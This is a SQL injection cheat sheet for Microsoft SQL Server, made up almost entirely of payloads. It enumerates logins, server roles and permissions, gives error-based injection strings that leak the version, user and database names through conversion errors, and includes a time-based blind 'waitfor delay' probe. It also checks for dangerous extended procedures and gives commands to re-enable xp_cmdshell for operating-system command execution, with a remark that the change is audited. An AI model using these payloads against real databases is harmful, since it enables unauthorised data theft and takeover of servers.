SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');
# check the server roles of a specified login
SELECT is_srvrolemember('sysadmin', 'sa');
# check a database role
And 1=(Select IS_MEMBER('db_owner'))
# check for access to a database
And 1=(Select HAS_DBACCESS('master'))
# Get the login names holding a given right
SELECT name FROM
master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;
# Permissions currently held
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
# Error-based injection
# comparing a string value with a number forces a conversion error whose message leaks the value
Id=1 and @@version>0--
Id=1 and user>0--
Id=1 and db_name()>0--
# converting data to int raises an error that reveals database, table and column names
Id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--
Id=13 having 1=1 --
Id=13 group by <table name>.
<field name 1>, <field name 2> having 1=1 --
IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay '0:0:3'   -- time-based blind; note the space before the delay string
# Command execution: check whether the extended procedures exist before trying to use them (the original's first line lacked the "1=(...)" wrapper and is not valid on its own)
And 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') # registry access
And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') # write files through web-task output (the original labels this "backup")
And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') # register extended stored procedures
And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') # list subdirectories
And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') # list the directory tree
# Restore / remove xp_cmdshell. This is the SQL Server 2000 method; on 2005 and later the procedure is switched on with sp_configure 'show advanced options',1; RECONFIGURE; sp_configure 'xp_cmdshell',1; RECONFIGURE; — a configuration change that is typically logged and audited, so expect it to be noticed
Exec sp_addextendedproc xp_cmdshell, 'xplog70.dll'
Exec sp_dropextendedproc 'xp_cmdshell'